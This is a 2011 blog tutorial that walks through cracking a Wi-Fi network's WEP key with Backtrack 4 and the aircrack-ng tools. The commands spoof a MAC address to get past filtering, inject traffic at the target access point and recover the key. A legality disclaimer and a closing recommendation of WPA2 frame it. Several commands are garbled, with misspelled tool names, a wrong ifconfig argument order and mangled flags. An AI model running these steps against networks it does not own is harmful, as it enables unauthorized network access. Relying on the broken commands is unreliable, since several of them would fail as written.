Thursday, September 22, 2011

Wireless Hacking - Wired Equivalent privacy(WEP)

The most hacking I see it is the most easiest will be Wired Equivalent privacy(WEP) hacking, but till now there is still a lot of people using it.Maybe they need to be train to understand the risk behind it.

Some of the company I see they will use the Wired Equivalent privacy(WEP) and they believe MAC address filtering to protect from unauthorized users from accessing their infrastructure.Here I would show you some of the basic of it.Well let give you a short summary what is needed. You will need to have a wireless device and I do recommend the device as below

The strange thing is the device is from Taiwan and I was trying to look for it, but no one is aware of the brand.You can purchase the devices from DBROTH via Amazon Fulfillment

Overview of Wireless Equivalent Privacy(WEP)

WEP keys come in two sizes: 40 bit (5 byte) and 104 bit (13 byte). Initially, vendors supported only 40-bit keys. By today’s standards, 40-bit keys are ridiculously small.

As for today, many people use 104-bit keys. It should be noted that some vendors refer to these as 64-bit and 128-bit keys. A few vendors even support 256-bit keys. Vendors arrive at these numbers because Wired Equivalent privacy(WEP) uses a 24-bit initialization vector (IV). Because the IVs are sent in the clear, however, the key length is effectively 40 or 104 bit.

This article is provided for informational purposes only and its affiliates
accept no liability for providing this information. Please only use to test
configurations on your own equipment. Accessing WIFI networks that do
not belong to you is ILLEGAL.
This article will explain how to crack 64bit and 128bit Wired Equivalent privacy(WEP) on many WIFI access points and routers using Backtrack, a live linux distribution. Your mileage may very. The basic theory is that we want to connect to an Access Point using Wired Equivalent privacy(WEP) Encryption, but we do not know the key. We will attack the wifi router, making it generate packets for our cracking effort, finally cracking the Wired Equivalent privacy(WEP) key. Please use the document at your own risk, and the
author of this document wont be responsible for every single damage that
perform by anyone who use this material

Attacking Wired Equivalent Privacy(WEP) with client
Backtrack 4 on CD or USB
Computer with compatible 802.11 wireless card
Wireless Access point or WIFI Router using WEP encryption
I will assume that you have downloaded and booted into Backtrack 4. If you
haven’t figured that part out, you probably shouldn’t be trying to crack
WEP keys. Once Backtrack is loaded, open a shell and do the following:

Preparing The WIFI Card
First we must enable “Monitor Mode” on the wifi card. If using the Intel®
PRO/Wireless 3945ABG chipset issue the following commands:

modprobe -r iwl3945

modprobe ipwraw

The above commands will enable monitor mode on the wireless chipset in
your computer. Next we must stop your WIFI card:


Take note of your wireless adapter’s interface name. Then stop the adapter
by issuing:

airmon-ng stop [device]


ifconfig down [interface]

Now we must change the MAC address of the adapter:

macchanger --mac 00:11:22:33:44:66 [device]

Its now time to start the card in monitor mode by doing:

airmon-ng start [device]

Attacking The Target
It is now time to locate a suitable WEP enabled network to work with:

airodump-ng [device]

Be sure to note the MAC address (BSSID), channel (CH) and name (ESSID) of
the target network. Now we must start collecting data from the WIFI access
point for the attack:

airodump-ng -c [channel] -w [network.out] --bssid [bssid] [device]

The above command will output data collected to the file: network.out.
This file will be fed into the Wired Equivalent privacy(WEP) Crack program when we are ready to crack
the WEP key.

Open another shell and leave the previous command running. Now we
need to generate some fake packets to the access point to speed up the
data output. Test the access point by issuing the following command:

aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]

If this command is successful we will now generate many packets on the
target network so that we can crack the KEY. Type:

airplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]


airreply-ng –arpreplay –h 00:11:22:33:44:55 –b [BSSID] [device]

This will force the access point to send out a bunch of packets which we can
then use to crack the WEP key. Check your aerodump-ng shell and you
should see the “data” section filling up with packets

After about 10,000-20,000 you can begin cracking the WEP key. If there are
no other hosts on the target access point generating packets, you can try:

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66

Once you have enough packets, you begin the crack:

aircrack-ng -n 128 -b [bssid] [filename]-01.cap

The “-n 128″ signifies a 128-bit WEP key. If cracking fails, try a 64-bit key
by changing the value of N to 64.

Once the crack is successful you will be left with the wireless key! Remove the :
from the output and there is your key. So there you have it.
You can use these techniques to demonstrate to others why using WEP is a
bad idea. I suggest you use WPA2 encryption on your wireless networks.
Good luck!

No comments:

Post a Comment